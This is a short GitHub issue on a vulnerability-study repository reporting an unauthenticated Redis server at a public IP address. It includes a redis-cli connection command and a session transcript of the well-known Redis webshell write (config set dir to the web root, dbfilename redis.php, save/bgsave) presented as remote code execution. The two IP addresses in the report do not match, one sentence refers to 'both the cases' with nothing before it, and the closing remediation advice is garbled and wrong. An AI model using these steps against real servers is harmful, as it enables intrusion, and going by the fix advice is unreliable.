c0ny1/vulstudy

Misconfigured redis server

zipponnova opened this issue · 0 comments

Redis instance (1.14.157.192) is accepting anonymous connections at port 6379, you can start enumerating the service after connecting anonymously to :

  1. redis-cli -h 52.9.41.95

In both the cases you will have authenticated access to the server and you can enumerate anything in it. I am able to enumerate client list, check pidfile location, perform remote code execution, view real time logs on it.

RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>

Client list exposes the internal servers but I can only see my IP in it right now maybe you guys don't connect on this a lot but still secure it by restricting the port to only tcp and put noauth if udp is required.